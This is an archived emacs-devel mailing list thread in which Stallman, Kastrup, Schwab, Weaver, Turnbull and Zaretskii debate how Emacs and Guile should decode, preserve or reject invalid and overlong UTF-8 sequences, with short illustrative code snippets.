can think what they like.

    To put it another way, Mark said that Guile is intended to be useful
    writing servers as well as interactive programs.

This discussion is about Guile in the context of Emacs specifically.
"What Guile does" generally is a different, though related, topic.
Guile could follow the Unicode spec in normal operation, but offer
another mode that Emacs can use.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-06 16:47                                             ` Eli Zaretskii
                                                                 ` (2 preceding siblings ...)
  2014-10-06 18:04                                               ` Stefan Monnier
@ 2014-10-07 14:04                                               ` Richard Stallman
  2014-10-07 14:14                                                 ` David Kastrup
  2014-10-07 14:21                                                 ` Andreas Schwab
  3 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:04 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

      For
    >> example, the ASCII quote (") can be represented as the single byte 0x22,
    >> the two byte sequence 0xC0 0xA2, etc.

What does Emacs do now with a file that contains these "overlong"
sequences?


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-07 14:04                                               ` Richard Stallman
@ 2014-10-07 14:14                                                 ` David Kastrup
       [not found]                                                   ` <"<83y4srjaot.fsf"@gnu.org>
                                                                     ` (2 more replies)
  2014-10-07 14:21                                                 ` Andreas Schwab
  1 sibling, 3 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 14:14 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>       For
>     >> example, the ASCII quote (") can be represented as the single byte 0x22,
>     >> the two byte sequence 0xC0 0xA2, etc.
>
> What does Emacs do now with a file that contains these "overlong"
> sequences?

UTF-8 is defined as not containing "overlong" sequences, so Emacs
decodes them into two raw-byte indicating characters, one indicating
0xC0, one indicating 0xA2.  When encoding, it reassembles them into
0xC0 0xA2.
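
As a rough illustration of this round trip, here is a small Python
sketch.  It is an analogy only: it uses Python's "surrogateescape" error
handler rather than Emacs's own raw-byte characters, and the sample
bytes are made up for the example.

```python
# Input containing the overlong encoding of '"' (0xC0 0xA2) twice.
data = b'say \xc0\xa2hi\xc0\xa2'

# Decode as UTF-8, turning each undecodable byte into a lone surrogate
# (U+DC80..U+DCFF) instead of raising or silently "fixing" it.
text = data.decode("utf-8", errors="surrogateescape")

# One marker per invalid byte: 0xC0 and 0xA2 are kept apart.
raw_markers = [hex(ord(ch)) for ch in text if 0xDC80 <= ord(ch) <= 0xDCFF]

# Encoding with the same handler reassembles the original bytes.
round_tripped = text.encode("utf-8", errors="surrogateescape")
```

The overlong pair never becomes an ASCII quote in the decoded text, and
the bytes written back are identical to the bytes read.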

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 14:04                                               ` Richard Stallman
  2014-10-07 14:14                                                 ` David Kastrup
@ 2014-10-07 14:21                                                 ` Andreas Schwab
  1 sibling, 0 replies; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 14:21 UTC (permalink / raw)
  To: rms
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

>       For
>     >> example, the ASCII quote (") can be represented as the single byte 0x22,
>     >> the two byte sequence 0xC0 0xA2, etc.
>
> What does Emacs do now with a file that contains these "overlong"
> sequences?

It reads it with them as individual eight-bit chars, if you force it to
be decoded as utf-8.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."




* Re: Emacs Lisp's future
  2014-10-07 14:03                                                 ` Richard Stallman
@ 2014-10-07 14:21                                                   ` David Kastrup
  2014-10-07 15:16                                                     ` Andreas Schwab
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 14:21 UTC (permalink / raw)
  To: emacs-devel

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
> In the GNU Project, we do not "obey" standards.  Rather, we take them
> into account when judging what is best for the program to do.
>
> Emacs could conceivably report an error after decoding a file as UTF-8
> which turns out to have invalid text.  That way, the user will have
> the chance to decide whether to accept the decoding or not.

One problem with that is that quite often Emacs' choice of a coding
system for a buffer is the result of heuristics rather than dependable
information.  Not making a fuss might often be simplest.

-- 
David Kastrup





* Re: Emacs Lisp's future
  2014-10-07 14:03                                                 ` Richard Stallman
@ 2014-10-07 14:37                                                   ` Eli Zaretskii
  0 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-07 14:37 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Tue, 07 Oct 2014 10:03:37 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: eliz@gnu.org, dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca
> 
> Emacs normally recognizes UTF-8 text and decodes it.  If some text
> isn't proper UTF-8, it may use raw bytes for that text.  But when does
> it do this for text that can be decoded as UTF-8?  I don't think
> that ever happens.

It could happen if the user instructed Emacs to decode the text as
something else, like Latin-1.  But then I think it's the user's
responsibility.




* Re: Emacs Lisp's future
  2014-10-07 14:14                                                 ` David Kastrup
       [not found]                                                   ` <"<83y4srjaot.fsf"@gnu.org>
@ 2014-10-07 15:15                                                   ` Mark H Weaver
  2014-10-07 15:31                                                     ` Andreas Schwab
  2014-10-07 16:59                                                     ` Eli Zaretskii
  2014-10-08  0:47                                                   ` Richard Stallman
  2 siblings, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07 15:15 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii, stephen

David Kastrup <dak@gnu.org> writes:

> Richard Stallman <rms@gnu.org> writes:
>
>> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
>> [[[ whether defending the US Constitution against all enemies,     ]]]
>> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>>
>>       For
>>     >> example, the ASCII quote (") can be represented as the single byte 0x22,
>>     >> the two byte sequence 0xC0 0xA2, etc.
>>
>> What does Emacs do now with a file that contains these "overlong"
>> sequences?
>
> UTF-8 is defined as not containing "overlong" sequences, so Emacs
> decodes them into two raw-byte indicating characters, one indicating
> 0xC0, one indicating 0xA2.  When encoding, it reassembles them into
> 0xC0 0xA2.

When editing a file, this is probably the right default behavior,
although ideally it should warn the user.

However, if the overlong sequence came from the network, and Emacs
propagates it unchanged to internal subsystems[*] (e.g. via command-line
arguments to subprocesses), that's not good.  It exposes another program
to invalid input -- a program that might not be designed for exposure to
possible attacks via overlong encodings.

[*] By "internal subsystem" I mean any part of the overall system that's
not directly accessible to attacks.  This includes subprocesses or
daemons that are not accessible from the outside network.
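
A minimal sketch of the kind of check meant here, in Python and with a
hypothetical helper name: validate strictly at the boundary, before the
data is handed to anything internal.  Python's default UTF-8 decoder is
strict and rejects overlong forms.

```python
def require_strict_utf8(data: bytes) -> str:
    """Return the decoded text, or raise ValueError if data is not valid UTF-8."""
    try:
        # errors="strict" is the default; overlong sequences such as
        # 0xC0 0xA2 are rejected rather than decoded as '"'.
        return data.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise ValueError(f"invalid UTF-8 at byte offset {exc.start}") from exc
```

A caller would run network input through such a check and refuse (or
ask the user) on failure, instead of passing the bytes on unchanged.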

      Mark




* Re: Emacs Lisp's future
  2014-10-07 14:21                                                   ` David Kastrup
@ 2014-10-07 15:16                                                     ` Andreas Schwab
  2014-10-07 15:33                                                       ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 15:16 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> One problem with that is that quite often Emacs' choice of a coding
> system for a buffer is the result of heuristics rather than dependable
> information.  Not making a fuss might often be simplest.

If you try to save a buffer Emacs will check whether all characters are
encodable, and complain (and ask) if they aren't.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."




* Re: Emacs Lisp's future
  2014-10-07 15:15                                                   ` Mark H Weaver
@ 2014-10-07 15:31                                                     ` Andreas Schwab
  2014-10-07 15:40                                                       ` David Kastrup
  2014-10-07 16:34                                                       ` Mark H Weaver
  2014-10-07 16:59                                                     ` Eli Zaretskii
  1 sibling, 2 replies; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 15:31 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: David Kastrup, Richard Stallman, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> However, if the overlong sequence came from the network, and Emacs
> propagates it unchanged to internal subsystems[*] (e.g. via command-line
> arguments to subprocesses), that's not good.  It exposes another program
> to invalid input -- a program that might not be designed for exposure to
> possible attacks via overlong encodings.

At least it doesn't make it worse (it is unchanged from the situation if
you remove Emacs as a filter).

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."




* Re: Emacs Lisp's future
  2014-10-07 15:16                                                     ` Andreas Schwab
@ 2014-10-07 15:33                                                       ` David Kastrup
  2014-10-07 15:42                                                         ` Andreas Schwab
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 15:33 UTC (permalink / raw)
  To: emacs-devel

Andreas Schwab <schwab@suse.de> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> One problem with that is that quite often Emacs' choice of a coding
>> system for a buffer is the result of heuristics rather than dependable
>> information.  Not making a fuss might often be simplest.
>
> If you try to save a buffer Emacs will check whether all characters are
> encodable, and complain (and ask) if they aren't.

Sure, but a raw byte is trivially encodable since it is no character.

-- 
David Kastrup





* Re: Emacs Lisp's future
  2014-10-07 15:31                                                     ` Andreas Schwab
@ 2014-10-07 15:40                                                       ` David Kastrup
  2014-10-07 18:32                                                         ` Stephen J. Turnbull
  2014-10-07 16:34                                                       ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 15:40 UTC (permalink / raw)
  To: Andreas Schwab
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Andreas Schwab <schwab@suse.de> writes:

> Mark H Weaver <mhw@netris.org> writes:
>
>> However, if the overlong sequence came from the network, and Emacs
>> propagates it unchanged to internal subsystems[*] (e.g. via command-line
>> arguments to subprocesses), that's not good.  It exposes another program
>> to invalid input -- a program that might not be designed for exposure to
>> possible attacks via overlong encodings.
>
> At least it doesn't make it worse (it is unchanged from the situation if
> you remove Emacs as a filter).

And if Emacs is supposed to be used as a propagate-only-valid-utf-8
filter (which it definitely can do), that should be in the spec and
Emacs should then be programmed to implement the desired failure mode.

Just bombing out in some predetermined manner in some fixed location is
not a substitute for properly planned behavior.

If you want Emacs (or GUILE, or whatever) to take a particular action in
a particular case in order to provide output with particular guarantees
to particular processing stages, then "somebody thought it was a good
idea" in some inconvenient place is not a substitute.

Unless told differently, a tool like GUILE or Emacs, when used as a
filter, should do exactly _those_ filtering operations you tell it.  Not
more, not less.  Anything else is _guaranteed_ to get in the way
eventually.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 15:33                                                       ` David Kastrup
@ 2014-10-07 15:42                                                         ` Andreas Schwab
  2014-10-07 16:03                                                           ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 15:42 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>
>>> One problem with that is that quite often Emacs' choice of a coding
>>> system for a buffer is the result of heuristics rather than dependable
>>> information.  Not making a fuss might often be simplest.
>>
>> If you try to save a buffer Emacs will check whether all characters are
>> encodable, and complain (and ask) if they aren't.
>
> Sure, but a raw byte is trivially encodable since it is no character.

This is a contradiction.  It isn't a character, so it isn't encodable.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."




* Re: Emacs Lisp's future
  2014-10-07 14:04                                             ` Richard Stallman
@ 2014-10-07 15:43                                               ` Stephen J. Turnbull
  2014-10-07 16:01                                                 ` David Kastrup
  2014-10-07 16:16                                                 ` David Kastrup
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07 15:43 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 >     To put it another way, Mark said that Guile is intended to be useful
 >     writing servers as well as interactive programs.
 > 
 > This discussion is about Guile in the context of Emacs specifically.
 > "What Guile does" generally is a different, though related, topic.
 > Guile could follow the Unicode spec in normal operation, but offer
 > another mode that Emacs can use.

It *could*, but for the default it is entirely unclear to me that it
*should*.  Some use cases, such as AUCTeX parsing error messages from
TeX (which treats content quoted from the document as bytes, and so
may slice characters into two invalid byte sequences), will use some
sort of reversible encoding of raw bytes (the current Emacs encoding
is one option, of course).  But they can do that explicitly.

However, in general I think that Emacs should help users who are naive
about Unicode to avoid emitting invalid Unicode, and so should default
to querying the user for permission if that were about to happen.  It
should not silently pass on corrupt input to the output.





* Re: Emacs Lisp's future
  2014-10-07 15:43                                               ` Stephen J. Turnbull
@ 2014-10-07 16:01                                                 ` David Kastrup
  2014-10-07 18:15                                                   ` Stephen J. Turnbull
  2014-10-07 16:16                                                 ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:01 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Richard Stallman writes:
>
>  >     To put it another way, Mark said that Guile is intended to be useful
>  >     writing servers as well as interactive programs.
>  > 
>  > This discussion is about Guile in the context of Emacs specifically.
>  > "What Guile does" generally is a different, though related, topic.
>  > Guile could follow the Unicode spec in normal operation, but offer
>  > another mode that Emacs can use.
>
> It *could*, but for the default it is entirely unclear to me that it
> *should*.  Some use cases, such as AUCTeX parsing error messages from
> TeX (which treats content quoted from the document as bytes, and so
> may slice characters into two invalid byte sequences), will use some
> sort of reversible encoding of raw bytes (the current Emacs encoding
> is one option, of course).  But they can do that explicitly.
>
> However, in general I think that Emacs should help users who are naive
> about Unicode to avoid emitting invalid Unicode, and so should default
> to querying the user for permission if that were about to happen.  It
> should not silently pass on corrupt input to the output.

I repeat: that is to be the choice of the application rather than the
engine.  "We know better than the application writer what he wants" is
rarely going to work to the satisfaction of all.  This leads to "how do
I best work around the engine" approaches that tend to be much less
maintainable than explicit actions taken in a place intended by the
application.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 15:42                                                         ` Andreas Schwab
@ 2014-10-07 16:03                                                           ` David Kastrup
  2014-10-07 16:16                                                             ` Andreas Schwab
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:03 UTC (permalink / raw)
  To: Andreas Schwab; +Cc: emacs-devel

Andreas Schwab <schwab@suse.de> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> Andreas Schwab <schwab@suse.de> writes:
>>
>>> David Kastrup <dak@gnu.org> writes:
>>>
>>>> One problem with that is that quite often Emacs' choice of a coding
>>>> system for a buffer is the result of heuristics rather than dependable
>>>> information.  Not making a fuss might often be simplest.
>>>
>>> If you try to save a buffer Emacs will check whether all characters are
>>> encodable, and complain (and ask) if they aren't.
>>
>> Sure, but a raw byte is trivially encodable since it is no character.
>
> This is a contradiction.  It isn't a character, so it isn't encodable.

The character representation of "raw byte" is trivially encodable since
it represents a single byte in any encoding.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 16:03                                                           ` David Kastrup
@ 2014-10-07 16:16                                                             ` Andreas Schwab
  2014-10-07 16:24                                                               ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 16:16 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>
>>> Andreas Schwab <schwab@suse.de> writes:
>>>
>>>> David Kastrup <dak@gnu.org> writes:
>>>>
>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>> information.  Not making a fuss might often be simplest.
>>>>
>>>> If you try to save a buffer Emacs will check whether all characters are
>>>> encodable, and complain (and ask) if they aren't.
>>>
>>> Sure, but a raw byte is trivially encodable since it is no character.
>>
>> This is a contradiction.  It isn't a character, so it isn't encodable.
>
> The character representation of "raw byte" is trivially encodable since
> it represents a single byte in any encoding.

No encoding (except raw-text) can encode characters from the eight-bit
charset.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."




* Re: Emacs Lisp's future
  2014-10-07 15:43                                               ` Stephen J. Turnbull
  2014-10-07 16:01                                                 ` David Kastrup
@ 2014-10-07 16:16                                                 ` David Kastrup
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:16 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Richard Stallman writes:
>
>  >     To put it another way, Mark said that Guile is intended to be useful
>  >     writing servers as well as interactive programs.
>  > 
>  > This discussion is about Guile in the context of Emacs specifically.
>  > "What Guile does" generally is a different, though related, topic.
>  > Guile could follow the Unicode spec in normal operation, but offer
>  > another mode that Emacs can use.
>
> It *could*, but for the default it is entirely unclear to me that it
> *should*.  Some use cases, such as AUCTeX parsing error messages from
> TeX (which treats content quoted from the document as bytes, and so
> may slice characters into two invalid byte sequences), will use some
> sort of reversible encoding of raw bytes (the current Emacs encoding
> is one option, of course).  But they can do that explicitly.

Not really.  The terminal/log output will in general reflect the
encoding of the source document and it is human-readable, so you want
the output filter to generally decode as utf-8.  Now TeX may indeed
choose to slice multibyte characters in two (for example, because it
inserts newlines in its output every 79 bytes).  Parsing the error
messages properly requires the ability to reconstruct the input before
the output filter decoded it.  Neither having the output filter pass
everything as bytes (that will make the output generally unfit for human
consumption rather than just in single places) nor "sanitizing" it (that
will make reconstruction of the original context impossible) are
satisfactory here.
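
As a rough illustration of that requirement (in Python rather than Emacs
Lisp, and not AUCTeX's actual code), the sketch below assumes a
hypothetical byte-oriented wrapper, wrap_bytes, that cuts a UTF-8
message in the middle of a character.  Decoding each piece with Python's
surrogateescape error handler keeps the stray bytes recoverable, whereas
errors="replace" throws them away:

```python
def wrap_bytes(data, width):
    """Cut data into chunks of at most `width` bytes, ignoring character boundaries."""
    return [data[i:i + width] for i in range(0, len(data), width)]


def decode_reversibly(chunk):
    """Decode as UTF-8, mapping each undecodable byte to a lone surrogate."""
    return chunk.decode("utf-8", errors="surrogateescape")


def reconstruct(pieces):
    """Turn reversibly decoded pieces back into bytes, rejoin, and decode strictly."""
    raw = b"".join(p.encode("utf-8", errors="surrogateescape") for p in pieces)
    return raw.decode("utf-8")


# Hypothetical message; the final "é" is the two bytes 0xC3 0xA9.
original = "! Undefined control sequence: caf\u00e9"
data = original.encode("utf-8")

# A width of len(data) - 1 puts 0xC3 at the end of the first chunk and
# 0xA9 alone in the second, so neither chunk is valid UTF-8 by itself.
chunks = wrap_bytes(data, len(data) - 1)

# Reversible decoding: the stray bytes survive as lone surrogates.
decoded = [decode_reversibly(c) for c in chunks]

# "Sanitizing" decoding: the stray bytes become U+FFFD and are lost.
sanitized = [c.decode("utf-8", errors="replace") for c in chunks]

# Only the reversible pieces can be reassembled into the original text.
restored = reconstruct(decoded)
```

The point of the sketch is only that the choice between the two
decodings has to be available to the application; which one is the
default is a separate question.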

The "I know you don't want me to produce anything other than utf-8
anyway" attitude is just getting in the way of such application needs.
Sometimes things are messy, and it must remain the application's choice
how it wants the mess to be dealt with.

> However, in general I think that Emacs should help users who are naive
> about Unicode to avoid emitting invalid Unicode, and so should default
> to querying the user for permission if that were about to happen.  It
> should not silently pass on corrupt input to the output.

You are confusing Emacs with the applications running on it.  It is not
the job of an engine to make the decisions for an application.  In
general, an engine should deal with the problems you tell it to deal
with.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 16:16                                                             ` Andreas Schwab
@ 2014-10-07 16:24                                                               ` David Kastrup
  2014-10-07 16:31                                                                 ` Andreas Schwab
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:24 UTC (permalink / raw)
  To: Andreas Schwab; +Cc: emacs-devel

Andreas Schwab <schwab@suse.de> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> Andreas Schwab <schwab@suse.de> writes:
>>
>>> David Kastrup <dak@gnu.org> writes:
>>>
>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>
>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>
>>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>>> information.  Not making a fuzz might often be simplest.
>>>>>
>>>>> If you try to save a buffer Emacs will check whether all characters are
>>>>> encodable, and complain (and ask) if they aren't.
>>>>
>>>> Sure, but a raw byte is trivially encodable since it is no character.
>>>
>>> This is a contradiction.  It isn't a character, so it isn't encodable.
>>
>> The character representation of "raw byte" is trivially encodable since
>> it represents a single byte in any encoding.
>
> No encoding (except raw-text) can encode characters from the eight-bit
> charset.

(encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8)
=> "\200"

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 16:24                                                               ` David Kastrup
@ 2014-10-07 16:31                                                                 ` Andreas Schwab
  2014-10-07 16:52                                                                   ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 16:31 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>
>>> Andreas Schwab <schwab@suse.de> writes:
>>>
>>>> David Kastrup <dak@gnu.org> writes:
>>>>
>>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>>
>>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>>
>>>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>>>> information.  Not making a fuzz might often be simplest.
>>>>>>
>>>>>> If you try to save a buffer Emacs will check whether all characters are
>>>>>> encodable, and complain (and ask) if they aren't.
>>>>>
>>>>> Sure, but a raw byte is trivially encodable since it is no character.
>>>>
>>>> This is a contradiction.  It isn't a character, so it isn't encodable.
>>>
>>> The character representation of "raw byte" is trivially encodable since
>>> it represents a single byte in any encoding.
>>
>> No encoding (except raw-text) can encode characters from the eight-bit
>> charset.
>
> (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8)
> => "\200"

That's what you get if you *force* the coding system.  But Emacs will
still complain and ask if you try to save such a buffer.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."




* Re: Emacs Lisp's future
  2014-10-07 15:31                                                     ` Andreas Schwab
  2014-10-07 15:40                                                       ` David Kastrup
@ 2014-10-07 16:34                                                       ` Mark H Weaver
  2014-10-07 17:50                                                         ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07 16:34 UTC (permalink / raw)
  To: Andreas Schwab
  Cc: David Kastrup, Richard Stallman, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Andreas Schwab <schwab@suse.de> writes:

> Mark H Weaver <mhw@netris.org> writes:
>
>> However, if the overlong sequence came from the network, and Emacs
>> propagates it unchanged to internal subsystems[*] (e.g. via command-line
>> arguments to subprocesses), that's not good.  It exposes another program
>> to invalid input -- a program that might not be designed for exposure to
>> possible attacks via overlong encodings.
>
> At least it doesn't make it worse (it is unchanged from the situation if
> you remove Emacs as a filter).

In the case of mere "filtering", you might be right in some cases.

However, the case I'm worried about is where some small piece of the
hostile input is extracted and passed as an argument to another program.
In cases like this it doesn't make sense to think of emacs as a
"filter", and you'd never be able to "remove" it.

It's like saying that a web application that passes unsanitized input to
an SQL query "doesn't make it worse", and that the situation is
unchanged from if you provided public access to the SQL database.

      Mark
     




* Re: Emacs Lisp's future
  2014-10-07 16:31                                                                 ` Andreas Schwab
@ 2014-10-07 16:52                                                                   ` David Kastrup
  2014-10-07 17:38                                                                     ` Andreas Schwab
  2014-10-08  0:47                                                                     ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:52 UTC (permalink / raw)
  To: Andreas Schwab; +Cc: emacs-devel

Andreas Schwab <schwab@suse.de> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> Andreas Schwab <schwab@suse.de> writes:
>>
>>> David Kastrup <dak@gnu.org> writes:
>>>
>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>
>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>
>>>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>>>
>>>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>>>
>>>>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>>>>> information.  Not making a fuzz might often be simplest.
>>>>>>>
>>>>>>> If you try to save a buffer Emacs will check whether all characters are
>>>>>>> encodable, and complain (and ask) if they aren't.
>>>>>>
>>>>>> Sure, but a raw byte is trivially encodable since it is no character.
>>>>>
>>>>> This is a contradiction.  It isn't a character, so it isn't encodable.
>>>>
>>>> The character representation of "raw byte" is trivially encodable since
>>>> it represents a single byte in any encoding.
>>>
>>> No encoding (except raw-text) can encode characters from the eight-bit
>>> charset.
>>
>> (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8)
>> => "\200"
>
> That's what you get if you *force* the coding system.

It would appear that you are forcing your logic.  "No encoding can ..."
does not mean that.

> But Emacs will still complain and ask if you try to save such a
> buffer.

(let ((coding-system-for-write 'utf-8-unix))
  (with-temp-file "/tmp/bozo"
    (insert (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8))))

od /tmp/bozo
0000000 000200
0000001

What you mean is that when Emacs is asked to _select_ or to _verify_ a
coding system (as is customary for interactive editing of a file), it
will do so and get back to the user when necessary.

But that is _quite_ different from Emacs being _incapable_ of encoding
raw bytes to a file or a stream of a specified encoding.  It means that
when you are using an _application_ that is expected to deliver only
decodable characters, then the _application_ will _ask_ before going
ahead.

But the _engine_ is perfectly capable of going through here.  Once you
confuse engine and application and state "Emacs should not be able to
encode characters from the eight-bit set" rather than "the normal file
saving operation defaulting to using buffer-file-coding-system for
coding-system-for-write after verifying its suitability should ask
before picking a value of coding-system-for-write that causes a file to
be written that is not representable without raw bytes" you are
proposing to cripple Emacs.

Or GUILE.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 15:15                                                   ` Mark H Weaver
  2014-10-07 15:31                                                     ` Andreas Schwab
@ 2014-10-07 16:59                                                     ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-07 16:59 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Cc: Richard Stallman <rms@gnu.org>,  Eli Zaretskii <eliz@gnu.org>,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Tue, 07 Oct 2014 11:15:05 -0400
> 
> > UTF-8 is defined as not containing "overlong" sequences, so Emacs
> > decodes them into two raw-byte indicating characters, one indicating
> > 0xC0, one indicating 0xA2.  When encoding, it reassembles them into
> > 0xC0 0xA2.
> 
> When editing a file, this is probably the right default behavior,
> although ideally it should warn the user.

It does, when the user modifies the file and then saves it.




* Re: Emacs Lisp's future
  2014-10-07 16:52                                                                   ` David Kastrup
@ 2014-10-07 17:38                                                                     ` Andreas Schwab
